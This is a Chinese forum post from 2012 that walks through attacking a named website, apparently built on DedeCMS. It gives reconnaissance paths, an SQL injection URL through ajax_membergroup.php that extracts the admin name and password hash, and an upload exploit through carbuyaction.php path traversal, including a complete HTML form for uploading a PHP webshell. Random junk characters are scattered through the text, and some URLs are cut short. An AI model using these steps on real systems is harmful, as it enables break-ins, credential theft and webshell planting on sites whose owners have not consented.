①注入漏洞。( K) w8 K3 l7 O3 D% l$ ?5 R; J
这站 http://www.political-security.com/
8 G3 ?8 W6 h8 Q# X+ ~首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
7 f# _2 g1 _' B( j, G/ _www.political-security.com/data/mysql_error_trace.inc 爆后台
/ q. [$ U' z) r+ Q' M然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。. A9 s) f7 Y5 W5 u5 L @$ I7 u- C, j
然后写上语句 ) u' ]5 C; O$ i a& E
查看管理员帐号: x, W9 z* M% P i k/ W
http://www.political-security.co ... &membergroup=@`
! F8 a# C# g2 e* ?! h
1 t, _0 P4 S( }" N, l$ }+ Tadmin " ?+ _4 d6 l% R+ N6 Z5 z9 t# H8 S
3 f( D9 p0 @2 c& K( e查看管理员密码
& [7 n1 T5 [- {7 Z! M. P http://www.political-security.co ... &membergroup=@` n4 s8 r9 W, q1 o7 \$ n$ W8 b
) e) g |6 T# y# u- }! G3 C5 ]8d29b1ef9f8c5a5af429
5 j( `6 I: Z" X9 M, |) O1 z3 K# C+ d' \' z ^" a
查看管理员密码
0 I, F2 C; Q, e5 F% A6 _3 @
7 C+ z% i5 T5 J' L得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
& V: b! k. @) Q! \2 R- |; `3 Y) u$ V& N- N
8d2, z( m. y8 E2 ^. |2 t$ m S
9b1ef9f8c5a5af42! `$ ]; } i/ w6 }+ L; S! z
9" V+ k9 [2 N' z. I V
) c8 Y2 j$ X" g O; G q
cmd5没解出来 只好测试第二个方法
- C- N7 |: ?3 u4 x
8 r$ ~: w4 n) L% m- n# P2 E! `- f/ V3 C8 S
②上传漏洞:: s4 D% {: T: L4 a2 U+ s' o
3 {; [" o) B2 Q2 N: C8 `只要登陆会员中心,然后访问页面链接2 I& R5 r0 Z4 W3 l* d' H! @
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
+ x9 V. o, G2 R
( i7 @$ S& Z5 v( I" R如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
' `! J* N, L4 x! \/ @6 \7 K0 S- t/ F; s* b/ Q: i. R- N
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm7 R) K! h8 \% }
+ ]' S3 B! [- |<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>% e3 m P4 M: Y% @' v! }8 Y
或者
9 k+ K8 s" N) y# v即可上传成功 |
发表于 2012-9-13 10:56:59
收藏
支持
反对